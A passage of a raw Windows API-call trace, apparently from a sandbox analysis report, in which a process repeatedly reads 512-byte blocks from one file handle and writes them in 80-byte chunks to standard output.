[0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] GetFileType (hFile=0x50) returned 0x1 [0145.411] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.411] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.412] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.412] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] GetFileType (hFile=0x50) returned 0x1 [0145.412] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.412] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.413] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.413] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] GetFileType (hFile=0x50) returned 0x1 [0145.413] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.413] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.414] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.414] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] GetFileType (hFile=0x50) returned 0x1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.414] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.414] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.415] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.415] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.415] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.415] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.416] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.416] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] GetFileType (hFile=0x50) returned 0x1 [0145.416] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.416] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] GetFileType (hFile=0x50) returned 0x1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.417] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.417] GetFileType (hFile=0x50) returned 0x1 [0145.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.423] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.423] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.424] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.424] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] GetFileType (hFile=0x50) returned 0x1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.424] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.424] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f36c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f36c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f3bc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f3bc*, lpNumberOfBytesWritten=0x18e3c0*=0x20, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.425] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x18e3ac | out: lpNewFilePointer=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=4) returned 0x58 [0145.425] ReadFile (in: hFile=0x58, lpBuffer=0x18f1dc, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x18e3cc, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesRead=0x18e3cc*=0x200, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f1dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f1dc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f22c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f22c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f27c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f27c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f2cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f2cc*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType (hFile=0x50) returned 0x1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] WriteFile (in: hFile=0x50, lpBuffer=0x18f31c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x18e3c0, lpOverlapped=0x0 | out: lpBuffer=0x18f31c*, lpNumberOfBytesWritten=0x18e3c0*=0x50, lpOverlapped=0x0) returned 1 [0145.425] _get_osfhandle (_FileHandle=1) returned 0x50 [0145.425] GetFileType 